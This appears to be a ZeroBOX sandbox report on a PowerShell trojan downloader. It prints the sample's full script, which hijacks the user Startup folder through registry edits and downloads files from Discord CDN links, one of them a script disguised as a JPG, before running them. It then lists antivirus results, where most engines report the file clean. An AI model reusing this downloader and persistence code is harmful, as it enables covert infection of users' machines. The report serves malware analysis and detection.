Static | ZeroBOX
No static analysis available.
Function NJXH
[system.io.directory]::CreateDirectory("C:\P"+"r"+"o"+"g"+"ra"+"mDa"+"t"+"a\Micr"+"oso"+"f"+"t A"+"rts"+"\S"+"ta"+"rt\")
start-sleep -s 5
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "C:\ProgramData\Microsoft Arts\Start";
start-sleep -s 5
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" -Name "Startup" -Value "C:\ProgramData\Microsoft Arts\Start";
$p = 'C:\ProgramData\Microsoft Arts\Start\'
$ps1 = 'C:\Users\Public\'
$ali = 'C:\Users\Public\'
start-sleep -s 5
if((New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/808540577594736675/848370661323702282/firefox.lnk', $p + 'firefox.lnk')){
if((New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/808540577594736675/848370721717485588/firefox.bat', $ps1 + 'firefox.bat')){
if((New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/808540577594736675/848370352207691826/gO9BxdwXEaBmHAS2.jpg' , $ali + 'msynci.ps1')){
start "C:\ProgramData\Microsoft Arts\Start\firefox.lnk"
IEX NJXH
Antivirus Signature
Bkav Clean
MicroWorld-eScan Clean
FireEye Clean
CAT-QuickHeal Clean
ALYac Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
Cyren Clean
Symantec Clean
ESET-NOD32 PowerShell/TrojanDownloader.Agent.DVJ
Baidu Clean
TrendMicro-HouseCall Clean
Avast Clean
ClamAV Clean
Kaspersky Clean
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
AegisLab Clean
Rising Clean
Ad-Aware Clean
Sophos Clean
Comodo Clean
F-Secure Clean
DrWeb Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition Clean
CMC Clean
Emsisoft Clean
Ikarus Clean
GData Clean
Jiangmin Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Clean
Cynet Clean
AhnLab-V3 Clean
McAfee Clean
MAX Clean
VBA32 Clean
Zoner Clean
Tencent Powershell.Trojan-downloader.Agent.Ebrp
Yandex Clean
TACHYON Clean
MaxSecure Clean
Fortinet Clean
Panda Clean
Qihoo-360 Clean
No IRMA results available.